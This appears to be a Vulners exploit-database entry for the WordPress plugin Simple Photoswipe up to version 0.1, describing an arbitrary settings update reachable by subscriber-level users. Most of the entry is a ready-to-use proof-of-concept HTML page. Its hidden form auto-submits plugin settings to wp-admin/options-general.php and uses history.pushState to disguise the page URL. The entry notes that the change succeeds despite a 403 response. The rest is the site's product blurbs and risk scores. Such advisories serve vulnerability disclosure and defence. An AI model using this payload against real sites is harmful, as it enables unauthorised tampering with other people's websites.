Lucene search
+L

Simple Photoswipe <= 0.1 - Subscriber+ Arbitrary Settings Update

🗓️ 07 Jun 2024 00:00:00Reported by caonType 
wpexploit
 wpexploit
👁 154 Views

Simple Photoswipe <= 0.1 - Subscriber+ Arbitrary Settings Update exploitation via form submissio

Related
Code
<html>
  <body>
    <form action="http://WP/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="bar_size" value="anything" />
      <input type="hidden" name="indexIndicatorSep" value="anything" />
      <input type="hidden" name="loop_images" value="1" />
      <input type="hidden" name="show_close_element" value="1" />
      <input type="hidden" name="show_fullscreen_element" value="1" />
      <input type="hidden" name="show_zoom_element" value="1" />
      <input type="hidden" name="show_share_element" value="1" />
      <input type="hidden" name="show_counter_element" value="1" />
      <input type="hidden" name="show_arrow_element" value="1" />
      <input type="hidden" name="show_preloader_element" value="1" />
      <input type="hidden" name="tap_to_toggle_controls" value="1" />
      <input type="hidden" name="photoswipe_save" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


the response of the request above is 403, but the settings update still happens

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jun 2024 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00547
154